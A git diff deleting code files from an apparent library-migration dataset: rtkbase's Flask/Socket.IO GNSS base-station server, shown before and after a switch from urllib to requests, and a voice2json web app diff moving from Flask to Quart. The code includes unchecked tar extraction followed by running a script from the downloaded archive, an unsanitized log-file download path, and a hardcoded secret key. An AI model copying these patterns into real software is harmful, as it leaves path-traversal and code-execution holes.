- -from gevent import monkey -monkey.patch_all() -#import eventlet -#eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import urllib - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask import g -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = False -app.config["SECRET_KEY"] = "secret!" -#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password != "": - config_object.update_setting("general", 
"web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state != "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=True, emit = True): - """ - check if an update exists - """ - new_release = {} - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = urllib.request.urlopen(source_url) - response = json.loads(response.read()) - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - - if emit: - socketio.emit("new release", json.dumps(new_release), namespace="/test") - - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ - download and update rtkbase - """ - #Check if an update is available - update_url = check_update(emit=False).get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - response = urllib.request.urlopen(update_url) - with open(update_archive, "wb") as f: - for chunk in response: - f.write(chunk) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" - -@app.before_request -def inject_release(): - g.version = rtkbaseconfig.get("general", "version") - -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") 
-@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX 
version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] - for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(5) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py b/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py deleted file mode 100644 index 27136c3..0000000 --- a/v1/data/codefile/stefal@rtkbase__cf856c0__web_app$server.py.target.py +++ /dev/null @@ -1,473 +0,0 @@ -#!/usr/bin/python - -# ReachView code is 
placed under the GPL license. -# Written by Egor Fedorov (egor.fedorov@emlid.com) -# Copyright (c) 2015, Emlid Limited -# All rights reserved. - -# If you are interested in using ReachView code as a part of a -# closed source project, please contact Emlid Limited (info@emlid.com). - -# This file is part of ReachView. - -# ReachView is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. - -# ReachView is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. - -# You should have received a copy of the GNU General Public License -# along with ReachView. If not, see . - -#from gevent import monkey -#monkey.patch_all() -import eventlet -eventlet.monkey_patch() - -import time -import json -import os -import signal -import sys -import requests - -from threading import Thread -from RTKLIB import RTKLIB -from port import changeBaudrateTo115200 -from reach_tools import reach_tools, provisioner -from ServiceController import ServiceController -from RTKBaseConfigManager import RTKBaseConfigManager - -#print("Installing all required packages") -#provisioner.provision_reach() - -#import reach_bluetooth.bluetoothctl -#import reach_bluetooth.tcp_bridge - -from threading import Thread -from flask_bootstrap import Bootstrap -from flask import Flask, render_template, session, request, flash, url_for -from flask import send_file, send_from_directory, safe_join, redirect, abort -from flask import g -from flask_wtf import FlaskForm -from wtforms import PasswordField, BooleanField, SubmitField -from flask_login import LoginManager, login_user, logout_user, login_required, current_user, UserMixin -from wtforms.validators import ValidationError, DataRequired, EqualTo -from flask_socketio import SocketIO, emit, disconnect -from subprocess import check_output - -from werkzeug.security import generate_password_hash -from werkzeug.security import check_password_hash -from werkzeug.urls import url_parse - -app = Flask(__name__) -#app.template_folder = "." -app.debug = False -app.config["SECRET_KEY"] = "secret!" 
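The migrated server.py above begins with eventlet.monkey_patch() in exactly the slot the old gevent call occupied: the top of the module, ahead of every other import. Both libraries' guidance is that the patch must run before socket-using modules are imported, which is why the swap keeps that position. A minimal sketch of the two interchangeable setups:

    # eventlet flavour, as in the migrated file: patch first, import everything else after
    import eventlet
    eventlet.monkey_patch()

    # gevent equivalent, as in the pre-migration file:
    # from gevent import monkey
    # monkey.patch_all()

    import requests  # safe to import only after the patch has been applied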
-#TODO take theses paths from settings.conf -app.config["UPLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../logs") -app.config["DOWNLOAD_FOLDER"] = os.path.join(os.path.dirname(__file__), "../data") -app.config["LOGIN_DISABLED"] = False - -#path_to_gnss_log = os.path.join(os.path.dirname(os.path.realpath(__file__)), "logs") -#path_to_gnss_log = "/home/stephane/gnss_venv/rtkbase/data/" -#path_to_rtklib = os.path.join(os.path.expanduser("~"), "gnss_venv/RTKLIB") -path_to_rtklib = "/usr/local/bin" - -login=LoginManager(app) -login.login_view = 'login_page' -socketio = SocketIO(app) -bootstrap = Bootstrap(app) - -rtk = RTKLIB(socketio, rtklib_path=path_to_rtklib, log_path=app.config["DOWNLOAD_FOLDER"]) -services_list = [{"service_unit" : "str2str_tcp.service", "name" : "main"}, - {"service_unit" : "str2str_ntrip.service", "name" : "ntrip"}, - {"service_unit" : "str2str_file.service", "name" : "file"},] - - -#Delay before rtkrcv will stop if no user is on status.html page -rtkcv_standby_delay = 600 - -rtkbaseconfig = RTKBaseConfigManager(os.path.join(os.path.dirname(__file__), "../settings.conf.default"), os.path.join(os.path.dirname(__file__), "../settings.conf")) - -class User(UserMixin): - def __init__(self, username): - self.id=username - self.password_hash = rtkbaseconfig.get("general", "web_password_hash") - - def check_password(self, password): - return check_password_hash(self.password_hash, password) - -class LoginForm(FlaskForm): - #username = StringField('Username', validators=[DataRequired()]) - password = PasswordField('Please enter the password:', validators=[DataRequired()]) - remember_me = BooleanField('Remember Me') - submit = SubmitField('Sign In') - -def update_password(config_object): - """ - Check in settings.conf if web_password entry contains a value - If yes, this function will generate a new hash for it and - remove the web_password value - :param config_object: a RTKBaseConfigManager instance - """ - new_password = config_object.get("general", "web_password") - if new_password != "": - config_object.update_setting("general", "web_password_hash", generate_password_hash(new_password)) - config_object.update_setting("general", "web_password", "") - -def manager(): - - while True: - if rtk.sleep_count > rtkcv_standby_delay and rtk.state != "inactive": - rtk.stopBase() - rtk.sleep_count = 0 - elif rtk.sleep_count > 10: - print("Je voudrais bien arrêter, mais rtk.state est : ", rtk.state) - time.sleep(1) - -@socketio.on("check update", namespace="/test") -def check_update(source_url = None, current_release = None, prerelease=True, emit = True): - """ - check if an update exists - """ - new_release = {} - source_url = source_url if source_url is not None else "https://api.github.com/repos/stefal/rtkbase/releases" - current_release = current_release if current_release is not None else rtkbaseconfig.get("general", "version").strip("v").strip('alpha').strip('beta') - - try: - response = requests.get(source_url) - response = response.json() - for release in response: - if release.get("prerelease") == prerelease: - latest_release = release["tag_name"].strip("v").strip('alpha').strip('beta') - if latest_release > current_release: - new_release = {"new_release" : latest_release, "url" : release.get("tarball_url")} - break - - except Exception as e: - print("Check update error: ", e) - - if emit: - socketio.emit("new release", json.dumps(new_release), namespace="/test") - - return new_release - -@socketio.on("update rtkbase", namespace="/test") -def update_rtkbase(): - """ 
- download and update rtkbase - """ - #Check if an update is available - update_url = check_update(emit=False).get("url") - if update_url is None: - return - - import tarfile - #Download update - update_archive = "/var/tmp/rtkbase_update.tar.gz" - try: - response = requests.get(update_url) - with open(update_archive, "wb") as f: - f.write(response.content) - except Exception as e: - print("Error: Can't download update - ", e) - - #Get the "root" folder in the archive - tar = tarfile.open(update_archive) - for tarinfo in tar: - if tarinfo.isdir(): - primary_folder = tarinfo.name - break - - #Extract archive - tar.extractall("/var/tmp") - - #launch update script - rtk.shutdownBase() - rtkbase_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../")) - script_path = os.path.join("/var/tmp/", primary_folder, "rtkbase_update.sh") - os.execl(script_path, rtkbase_path, app.config["DOWNLOAD_FOLDER"].split("/")[-1]) - -# at this point we are ready to start rtk in 2 possible ways: rover and base -# we choose what to do by getting messages from the browser - -#@app.route("/") -#def index(): -# rtk.logm.updateAvailableLogs() -# return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) - -""" -def index(): - #if not session.get('logged_in'): - # return render_template('login.html') - #else: - rtk.logm.updateAvailableLogs() - return render_template("index.html", logs = rtk.logm.available_logs, system_status = reach_tools.getSystemStatus()) -""" - -@app.before_request -def inject_release(): - g.version = rtkbaseconfig.get("general", "version") - -@login.user_loader -def load_user(id): - return User(id) - -@app.route('/') -@app.route('/index') -@app.route('/status') -@login_required -def status_page(): - return render_template("status.html") - -@app.route('/settings') -@login_required -def settings_page(): - data = rtkbaseconfig.get_ordered_settings() - return render_template("settings.html", data = data) - -@app.route('/logs') -@login_required -def logs_page(): - return render_template("logs.html") - -@app.route("/logs/download/") -@login_required -def downloadLog(log_name): - try: - full_log_path = rtk.logm.log_path + "/" + log_name - return send_file(full_log_path, as_attachment = True) - except FileNotFoundError: - abort(404) - -""" -@app.route("/logs/download/") -def downloadLog(log_name): - try: - return send_from_directory(app.config["DOWNLOAD_FOLDER"], filename=log_name, as_attachment=True) - except FileNotFoundError: - abort(404) -""" -@app.route('/login', methods=['GET', 'POST']) -def login_page(): - if current_user.is_authenticated: - return redirect(url_for('status_page')) - loginform = LoginForm() - if loginform.validate_on_submit(): - user = User('admin') - password = loginform.password.data - if not user.check_password(password): - return abort(401) - - login_user(user, remember=loginform.remember_me.data) - next_page = request.args.get('next') - if not next_page or url_parse(next_page).netloc != '': - next_page = url_for('status_page') - - return redirect(next_page) - - return render_template('login.html', title='Sign In', form=loginform) - -@app.route('/logout') -def logout(): - logout_user() - return redirect(url_for('login_page')) - -#### Handle connect/disconnect events #### - -@socketio.on("connect", namespace="/test") -def testConnect(): - print("Browser client connected") - rtk.sendState() - -@socketio.on("disconnect", namespace="/test") -def testDisconnect(): - print("Browser client disconnected") - -#### Log 
list handling ### - -@socketio.on("get logs list", namespace="/test") -def getAvailableLogs(): - print("DEBUG updating logs") - rtk.logm.updateAvailableLogs() - print("Updated logs list is " + str(rtk.logm.available_logs)) - rtk.socketio.emit("available logs", rtk.logm.available_logs, namespace="/test") - -#### str2str launch/shutdown handling #### - -@socketio.on("launch base", namespace="/test") -def launchBase(): - rtk.launchBase() - -@socketio.on("shutdown base", namespace="/test") -def shutdownBase(): - rtk.shutdownBase() - -#### str2str start/stop handling #### - -@socketio.on("start base", namespace="/test") -def startBase(): - rtk.startBase() - -@socketio.on("stop base", namespace="/test") -def stopBase(): - rtk.stopBase() - -@socketio.on("on graph", namespace="/test") -def continueBase(): - rtk.sleep_count = 0 -#### Free space handler - -@socketio.on("get available space", namespace="/test") -def getAvailableSpace(): - rtk.socketio.emit("available space", reach_tools.getFreeSpace(path_to_gnss_log), namespace="/test") - -#### Delete log button handler #### - -@socketio.on("delete log", namespace="/test") -def deleteLog(json): - rtk.logm.deleteLog(json.get("name")) - # Sending the the new available logs - getAvailableLogs() - -#### Download and convert log handlers #### - -@socketio.on("process log", namespace="/test") -def processLog(json): - log_name = json.get("name") - - print("Got signal to process a log, name = " + str(log_name)) - print("Path to log == " + rtk.logm.log_path + "/" + str(log_name)) - - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.processLogPackage(raw_log_path) - -@socketio.on("cancel log conversion", namespace="/test") -def cancelLogConversion(json): - log_name = json.get("name") - raw_log_path = rtk.logm.log_path + "/" + log_name - rtk.cancelLogConversion(raw_log_path) - -#### RINEX versioning #### - -@socketio.on("read RINEX version", namespace="/test") -def readRINEXVersion(): - rinex_version = rtk.logm.getRINEXVersion() - rtk.socketio.emit("current RINEX version", {"version": rinex_version}, namespace="/test") - -@socketio.on("write RINEX version", namespace="/test") -def writeRINEXVersion(json): - rinex_version = json.get("version") - rtk.logm.setRINEXVersion(rinex_version) - -#### Update ReachView #### - -@socketio.on("update reachview", namespace="/test") -def updateReachView(): - print("Got signal to update!!!") - print("Server interrupted by user to update!!") -# rtk.shutdown() -# bluetooth_bridge.stop() -# socketio.server.stop() -# os.execl("/home/reach/update.sh", "", str(os.getpid())) - -#### Device hardware functions #### - -@socketio.on("reboot device", namespace="/test") -def rebootRtkbase(): - print("Rebooting...") - rtk.shutdown() - socketio.stop() - check_output("reboot") - -@socketio.on("shutdown device", namespace="/test") -def shutdownRtkbase(): - print("Shutdown...") - rtk.shutdown() - socketio.stop() - check_output(["shutdown", "now"]) - -@socketio.on("turn off wi-fi", namespace="/test") -def turnOffWiFi(): - print("Turning off wi-fi") -# check_output("rfkill block wlan", shell = True) - -#### Systemd Services functions #### - -def load_units(services): - #load unit service before getting status - for service in services: - service["unit"] = ServiceController(service["service_unit"]) - return services - - -@socketio.on("get services status", namespace="/test") -def getServicesStatus(): - print("Getting services status") - - for service in services_list: - service["active"] = service["unit"].isActive() - - services_status = [] 
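The loop just below strips the ServiceController instance stored under the 'unit' key before serializing, because json.dumps raises TypeError on arbitrary objects. A hedged, minimal illustration of that filtering step (the sample data is hypothetical):

    import json

    services = [{"name": "main", "active": True, "unit": object()}]  # 'unit' is not JSON-serializable
    safe = [{k: v for k, v in svc.items() if k != "unit"} for svc in services]
    payload = json.dumps(safe)  # works; json.dumps(services) would raise TypeError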
- for service in services_list: - services_status.append({key:service[key] for key in service if key != 'unit'}) - - print(services_status) - socketio.emit("services status", json.dumps(services_status), namespace="/test") - -@socketio.on("services switch", namespace="/test") -def switchService(json): - print("Received service to switch", json) - try: - for service in services_list: - if json["name"] == service["name"] and json["active"] == True: - print("Trying to start service {}".format(service["name"])) - service["unit"].start() - elif json["name"] == service["name"] and json["active"] == False: - print("Trying to stop service {}".format(service["name"])) - service["unit"].stop() - - except Exception as e: - print(e) - finally: - time.sleep(5) - getServicesStatus() - -if __name__ == "__main__": - try: - #check if a new password is defined in settings.conf - update_password(rtkbaseconfig) - #check if authentification is required - if not rtkbaseconfig.get_web_authentification(): - app.config["LOGIN_DISABLED"] = True - #load services status managed with systemd - services_list = load_units(services_list) - #Start a "manager" thread - manager_thread = Thread(target=manager, daemon=True) - manager_thread.start() - - app.secret_key = os.urandom(12) - socketio.run(app, host = "0.0.0.0", port = 8080) - - except KeyboardInterrupt: - print("Server interrupted by user!!") - - # clean up broadcast and blink threads - rtk.server_not_interrupted = False -# rtk.led.blinker_not_interrupted = False - rtk.waiting_for_single = False - - if rtk.coordinate_thread is not None: - rtk.coordinate_thread.join() - - if rtk.satellite_thread is not None: - rtk.satellite_thread.join() - -# if rtk.led.blinker_thread is not None: -# rtk.led.blinker_thread.join() - diff --git a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff b/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff deleted file mode 100644 index 2f01ef9..0000000 --- a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.diff +++ /dev/null @@ -1,225 +0,0 @@ -diff --git a/web/app.py b/web/app.py - index 6917d188b5e3fa43fce79b44d4e1ec161e1443ab..7ea7ddb8400775282e82c1adcb17b013f27ede2b 100644 - --- a/web/app.py - +++ b/web/app.py -@@ -17,15 +17,15 @@ from pathlib import Path - from typing import Optional, Dict, Any, Tuple, BinaryIO, List - - import pydash --from flask import Flask, request, render_template, send_from_directory, flash, send_file -+from quart import Quart, request, render_template, send_from_directory, flash, send_file - - # ----------------------------------------------------------------------------- - - profile_path: Optional[Path] = None - profile: Dict[str, Any] = {} - --# Flask application --app = Flask("voice2json") -+# Quart application -+app = Quart("voice2json") - app.secret_key = str(uuid4()) - - logger = logging.getLogger("app") -@@ -38,7 +38,7 @@ recording: bool = False - - - @app.route("/", methods=["GET", "POST"]) --def index(): -+async def index(): - """Handles recording, transcription, and intent recognition.""" - global record_proc, record_file, recording - -@@ -56,7 +56,8 @@ def index(): - wav_data: Optional[bytes] = None - - # Check if start/stopping recording -- if "record" in request.form: -+ form = await request.form -+ if "record" in form: - if record_proc is None: - # Start recording - record_file = tempfile.NamedTemporaryFile(mode="wb+") -@@ -91,18 +92,23 @@ def index(): - # Clean up - del record_file - record_file = None -- elif "upload" in request.form: -- if "wavfile" in 
request.files: -+ elif "upload" in form: -+ files = await request.files -+ if "wavfile" in files: - # Get WAV data from file upload -- wav_file = request.files["wavfile"] -+ wav_file = files["wavfile"] - wav_data = wav_file.read() - else: -- flash("No WAV file given", "danger") -- elif "recognize" in request.form: -+ await flash("No WAV file given", "danger") -+ elif "recognize" in form: - # Get sentence to recognize from form -- sentence = request.form["sentence"] -+ sentence = form["sentence"] - if len(sentence) == 0: -- flash("No sentence to recognize", "danger") -+ await flash("No sentence to recognize", "danger") -+ -+ transcribe_result = { -+ "text": sentence.strip() -+ } - - # --------------------------------------------------------------------- - -@@ -163,7 +169,7 @@ def index(): - # JSON for display to user - intent_str = json.dumps(intent, indent=4) if intent is not None else "" - -- return render_template( -+ return await render_template( - "index.html", - profile=profile, - pydash=pydash, -@@ -179,20 +185,21 @@ def index(): - - - @app.route("/sentences", methods=["GET", "POST"]) --def sentences(): -+async def sentences(): - """Reads/writes sentences.ini. Re-trains when sentences are saved.""" - sentences_path = Path(pydash.get(profile, "training.sentences-file")) - - if request.method == "POST": - # Save sentences -- sentences_text = request.form["sentences"] -+ form = await request.form -+ sentences_text = form["sentences"] - sentences_path.write_text(sentences_text) - do_retrain() - else: - # Load sentences - sentences_text = sentences_path.read_text() - -- return render_template( -+ return await render_template( - "sentences.html", profile=profile, pydash=pydash, sentences=sentences_text - ) - -@@ -201,7 +208,7 @@ def sentences(): - - - @app.route("/words", methods=["GET", "POST"]) --def words(): -+async def words(): - """Speaks words, guesses pronunciations, and reads/writes custom_words.txt. 
- Re-trains when custom words are saved.""" - -@@ -209,17 +216,18 @@ def words(): - word = "" - - if request.method == "POST": -- action = request.form["action"] -+ form = await request.form -+ action = form["action"] - - if action == "custom words": - # Save custom words -- custom_words_text = request.form["custom_words"] -+ custom_words_text = form["custom_words"] - custom_words_path.write_text(custom_words_text) - do_retrain() - elif action == "pronounce": - # Speak or guess pronunciation -- word = request.form["word"] -- is_speak = "speak" in request.form -+ word = form["word"] -+ is_speak = "speak" in form - if len(word) > 0: - if is_speak: - # Speak pronunciation -@@ -232,14 +240,14 @@ def words(): - - # Display guess(s) - for line in result: -- flash(line.strip(), "info") -+ await flash(line.strip(), "info") - else: -- flash("No word given", "danger") -+ await flash("No word given", "danger") - - # Load custom words - custom_words_text = custom_words_path.read_text() - -- return render_template( -+ return await render_template( - "words.html", - profile=profile, - pydash=pydash, -@@ -258,12 +266,13 @@ atexit.register(lambda: espeak_cache_dir.cleanup()) - - - @app.route("/phonemes", methods=["GET", "POST"]) --def phonemes(): -+async def phonemes(): - phoneme_map_path = Path(pydash.get(profile, "text-to-speech.espeak.phoneme-map")) - phoneme_map = {} - - if request.method == "POST": -- for var_name, var_value in request.form.items(): -+ form = await request.form -+ for var_name, var_value in form.items(): - if var_name.startswith("espeak_"): - phoneme = var_name[7:] - phoneme_map[phoneme] = var_value.strip() -@@ -272,7 +281,7 @@ def phonemes(): - for phoneme in sorted(phoneme_map): - print(phoneme, phoneme_map[phoneme], file=phoneme_map_file) - -- flash(f"Wrote {phoneme_map_path}", "success") -+ await flash(f"Wrote {phoneme_map_path}", "success") - - # Clear phoneme cache - for key in list(wav_cache.keys()): -@@ -353,7 +362,7 @@ def phonemes(): - - # logger.debug(phoneme_examples) - -- return render_template( -+ return await render_template( - "phonemes.html", - sorted=sorted, - profile=profile, -@@ -364,7 +373,7 @@ def phonemes(): - - - @app.route("/pronounce/", methods=["GET"]) --def pronounce(name): -+async def pronounce(name): - wav_path = wav_cache[name] - return send_file(open(wav_path, "rb"), mimetype="audio/wav") - -@@ -424,13 +433,13 @@ def voice2json(*args, text=True, input=None, stderr=None): - return io.BytesIO(subprocess.check_output(command, input=input, stderr=stderr)) - - --def do_retrain(): -+async def do_retrain(): - """Re-trains voice2json profile and flashes warnings for unknown words.""" - # Re-train - start_time = time.time() - result = voice2json("train-profile", stderr=subprocess.STDOUT).read() - train_seconds = time.time() - start_time -- flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") -+ await flash(f"Re-trained in {train_seconds:0.2f} second(s)", "success") - - logger.debug(result) - -@@ -448,7 +457,7 @@ def do_retrain(): - warn_lines.append(line) - - if warn_lines is not None: -- flash("\n".join(warn_lines), "warning") -+ await flash("\n".join(warn_lines), "warning") - - - # ----------------------------------------------------------------------------- diff --git a/v1/data/codefile/synesthesiam@voice2json__7ea7ddb__web$app.py.source.py 